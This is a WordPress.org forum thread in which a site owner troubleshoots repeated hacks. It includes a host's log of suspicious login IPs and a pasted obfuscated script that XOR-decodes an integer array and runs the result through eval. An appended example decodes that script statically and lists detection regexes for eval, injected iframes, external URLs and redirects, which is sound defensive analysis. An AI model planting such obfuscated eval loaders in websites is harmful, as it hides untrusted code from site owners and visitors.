WordPress.org

Forums

Site opens up in a text document (7 posts)

  1. lavalink
    Member
    Posted 3 years ago #

    Hi all,

    So I've dealt with two separate hacks in the past few months, and I thought I cleaned it all up. But today when I checked my website, when clicking through from Google, it didn't go to the page. All it would do is ask me if I wanted to save a text document to my computer. When I checked the document it was some strange encrypted data - obviously yet another hack!!!

    I looked up the SERP page in Firebug and noticed that instead of having a clean link to my WordPress site it's been replaced by this strange URL - I took a screenshot of it, along with the next result, and how it should look: http://screencast.com/t/O4vImwWP

    I also tried typing in my site's URL directly, lavalinkonline.com, and the same thing happened, though after I cached it, it was loading properly.

    I cannot find any information online about this hack. Can anyone please point me in the right direction or make any suggestions?

    A thousand thanks

  2. lavalink
    Member
    Posted 3 years ago #

    Any suggestions please? Anyone heard of anything like this before?

  3. ClaytonJames
    Member
    Posted 3 years ago #

    It was only happening for me on your home page. (opening as an octet stream) In the course of poking about, the symptom stopped. Give it another try and see if it works for you now. It's opening for me correctly from Google search now, too.

  4. lavalink
    Member
    Posted 3 years ago #

    Yes, but it's happening to everyone who visits for the first time ;X Represents a serious problem if people have to refresh the page a few times just to view it.

    I'm not even sure where to look to fix this problem...

  5. ClaytonJames
    Member
    Posted 3 years ago #

    Just so we're on the same page: I cleared my browser's cache and revisited the site (in more than one browser), so now, as a new visitor, the problem is no longer presenting itself for me. That makes me think it has nothing to do with the browser cache.

    My thoughts on this are: either this is an intermittent symptom (which if that is the case, you have not mentioned or have not noticed as of yet) or something server-side that has since been rectified.

    Did your host's support team have any ideas about what could be causing your root directory to be served with the wrong content type (opening as an octet stream) rather than a web page?

  6. lavalink
    Member
    Posted 3 years ago #

    Yes, I sent a support ticket to DreamHost, and they said that:

    Going through your user(s)' auth logs, I found the following which may be indicative of a password intrusion:

    - - - - - - - - - - - - - - - - - - - - - - -
    5 IPs have logged into user ### from 4 identified countries within the last 30 days, including:

    4 217.23.1.188 (Portugal)
    2 71.41.216.166 (United States)
    2 194.28.132.57 (Italy)
    1 204.12.247.66 (unknown)
    1 85.25.109.92 (Germany)

    This may indicate that your password has been compromised.
    - - - - - - - - - - - - - - - - - - - - - - -

    So it looks like I've been hacked again :( They gave me a long list of things to do to try to fix the issue, it seems like I have a lot of work to do... I wonder what it could be, that would affect ONLY the homepage?

  7. lavalink
    Member
    Posted 3 years ago #

    Ok, I checked the source code and there's a string that says "addLoadEvent" - could this possibly be the cause? There are a bunch of numbers in the middle which I don't recognize. It seems a little fishy. I've copied it below:

    <script type="text/javascript"><!--
    function addLoadEvent(func) {
        if( typeof jQuery != 'undefined' ) {
            jQuery(document).ready( func );
        } else if( typeof Prototype != 'undefined' ) {
            Event.observe( window, 'load', func );
        } else {
            var oldonload = window.onload;
            if (typeof window.onload != 'function') {
                window.onload = func;
            } else {
                window.onload = function() {
                    if (oldonload)
                        oldonload();

                    func();
                }
            }
        }
    }
    function wphc(){
    var wphc_data = [1531626042,1447812648,1347731580,1464330303,1280427825,1124966201,408344106,1531758379,1078317571,168069756,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357
,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,1869180,18711908,1325698157,1732763436,408737337,168069751,169643876,51744357,1347731580,1497491519,84907812,253132924,236815211,1565955943,1448526376,1347731580,1497491519,1157925924,1347731580,1464330303,1280427825,51224377];

        for (var i=0; i<wphc_data.length; i++){
            wphc_data[i]=wphc_data[i]^941930332;
        }

        var a = new Array(wphc_data.length);
        for (var i=0; i<wphc_data.length; i++) {
            a[i] = String.fromCharCode(wphc_data[i] & 0xFF, wphc_data[i]>>>8 & 0xFF, wphc_data[i]>>>16 & 0xFF, wphc_data[i]>>>24 & 0xFF);
        }

        return eval(a.join(''));
    }
    addLoadEvent(function(){var el=document.getElementById('wphc_value');if(el)el.value=wphc();});
    //--></script>
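
One way to see what the `wphc()` script in the last post hides without running it, as an added example that is not part of the original thread: the same XOR-and-unpack steps with the `eval` left out, followed by a scan of the decoded text. `decodeWords`, `triage`, `analyze` and the `INDICATORS` list are hypothetical names introduced here, and `SAMPLE` holds only the first three integers of the posted array.

```javascript
// Added example: decode a wphc()-style payload statically instead of eval()-ing it.
// KEY is the XOR constant from the posted script; SAMPLE is only the first three
// integers of the posted wphc_data array (paste the full array to decode all of it).
const KEY = 941930332;
const SAMPLE = [1531626042, 1447812648, 1347731580];

// Mirror the posted loops: XOR each 32-bit word with the key, then unpack its
// four bytes least-significant first. Nothing is executed.
function decodeWords(words, key) {
  let out = '';
  for (const w of words) {
    const v = (w ^ key) >>> 0; // force an unsigned 32-bit result
    out += String.fromCharCode(
      v & 0xff, (v >>> 8) & 0xff, (v >>> 16) & 0xff, (v >>> 24) & 0xff);
  }
  return out;
}

// Hypothetical triage list: constructs worth a closer look in decoded script text.
const INDICATORS = [
  ['nested eval', /\beval\s*\(/],
  ['document.write', /document\.write/],
  ['iframe/script injection', /<\s*(iframe|script)\b/i],
  ['external URL', /https?:\/\//i],
  ['redirect', /(window\.|document\.)?location(\.href)?\s*=/],
  ['char-code rebuilding', /fromCharCode|unescape\s*\(/],
];

// Return the names of every indicator that matches the decoded text.
function triage(text) {
  return INDICATORS.filter(([, re]) => re.test(text)).map(([name]) => name);
}

// Decode, then report the text, any indicator hits, and whether the output is
// plain printable ASCII (a wrong key or a binary payload fails this check).
function analyze(words, key) {
  const text = decodeWords(words, key);
  const printable = /^[\x09\x0a\x0d\x20-\x7e]*$/.test(text);
  return { text, findings: triage(text), printable };
}

console.log(analyze(SAMPLE, KEY));
```
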

Topic Closed

This topic has been closed to new replies.
